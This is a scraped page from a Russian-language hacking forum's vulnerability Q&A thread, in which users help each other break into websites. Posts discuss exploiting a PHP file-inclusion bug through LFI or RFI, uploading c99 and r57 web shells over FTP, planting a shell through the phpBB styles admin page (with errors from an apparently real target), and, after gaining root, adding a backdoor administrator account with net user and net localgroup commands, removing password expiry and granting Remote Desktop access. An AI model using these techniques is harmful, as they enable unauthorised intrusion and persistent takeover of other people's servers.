HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 865 из 2438 « Первая < 365765815855 861 862 863 864 865 866 867 868 869 87591596513651865 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8641  
Старый 22.08.2009, 22:31
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию
для данного примера
если magic_quotes_gpc = On и allow_url_include = Off то инклуда не выйдет
если allow_url_include = On то возможен RFI хотя могу ошибаться..
magic_quotes_gpc = Off и allow_url_include = Off то тут только LFI
хотя еще интересно откуда взял код этого скрипта
 
Ответить с цитированием

  #8642  
Старый 22.08.2009, 22:38
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию
Цитата:
Сообщение от bons  
для данного примера
если magic_quotes_gpc = On и allow_url_include = Off то инклуда не выйдет
если allow_url_include = On то возможен RFI хотя могу ошибаться..
magic_quotes_gpc = Off и allow_url_include = Off то тут только LFI
хотя еще интересно откуда взял код этого скрипта
шаровый двиг.
У самого такой стоял...какойто умелец нацарапал : )
Ну вот на моём примере что-то можно сделать? тут 1 я виу что проверка только file_exists()
 
Ответить с цитированием

  #8643  
Старый 22.08.2009, 22:52
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
Цитата:
Ну вот на моём примере что-то можно сделать? тут 1 я виу что проверка только file_exists()
http://forum.antichat.ru/thread23501.html ctrl +f "file_exists". Только LFI
 
Ответить с цитированием

  #8644  
Старый 22.08.2009, 23:11
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию
Цитата:
Сообщение от Pashkela  
http://forum.antichat.ru/thread23501.html ctrl +f "file_exists". Только LFI
почему только LFI?
при определенной удаче(allow_url_include = On) можно. Допустим если разместить шелл на ftp
 
Ответить с цитированием

  #8645  
Старый 23.08.2009, 01:34
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию
Pashkela, null байт и его замены не проходят
bons, пробовал на фтп залить...но когда указываю до фтп путь ничего не происходит
даж скрипт на false не уходит.
В чём может быть трабла? простто стараница пустая.

через 5мин...
Залил шелл на фтп с99 при открытии с сайта видна только шапка шелла...

через 10мин
Он просто обрезает шелл уже и р57 попробовал
Срезает по середине скрипта и всё...
Последний раз редактировалось Byrger; 23.08.2009 в 01:58..
 
Ответить с цитированием

  #8646  
Старый 23.08.2009, 02:29
_Quest_
Новичок
Регистрация: 21.05.2009
Сообщений: 11
С нами: 8933849

Репутация: 65
По умолчанию
лью шелл в пхп бб 2.0.21 через Стили http://forum.antichat.ru/thread24488.html
получяю следующую ошибку:
Код:
 ./../templates/tmp/theme_info.cfg in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
Warning: include(./../templates/tmp/theme_info.cfg) [function.include]: failed to open stream: No such file or directory in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
 Warning: include() [function.include]: Failed opening './../templates/tmp/theme_info.cfg' for inclusion (include_path='.') in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
 
Ответить с цитированием

  #8647  
Старый 23.08.2009, 02:42
_Quest_
Новичок
Регистрация: 21.05.2009
Сообщений: 11
С нами: 8933849

Репутация: 65
По умолчанию
Можно ли получить RDP доступ?
1 рутишь... это уже сам
2 создаешь админскую учетку:
net user учетка пароль /add
net localgroup administrators учетка /add
net accounts /maxpwage:unlimited

3 пуск -> выполнить -> mstsc.exe
 
Ответить с цитированием

  #8648  
Старый 23.08.2009, 03:40
_Quest_
Новичок
Регистрация: 21.05.2009
Сообщений: 11
С нами: 8933849

Репутация: 65
По умолчанию
Залей шелл к примеру от р57 и все команды по порядку кликая выполнить.
 
Ответить с цитированием

  #8649  
Старый 23.08.2009, 05:01
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами: 9466141

Репутация: 74
По умолчанию
Цитата:
Сообщение от DeluxeS  
Не помогает ((( к RDP подключается, проблемы с авторизацией
недо еще пользователя добавить в группу пользователей удаленного рабочего стола(Remote Desktop Users)
не всем пользователям разрешен доступ по RDP
 
Ответить с цитированием

  #8650  
Старый 23.08.2009, 10:14
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
net localgroup "Remote Desktop Users" учетка /add
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ
Страница 865 из 2438 « Первая < 365765815855 861 862 863 864 865 866 867 868 869 87591596513651865 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.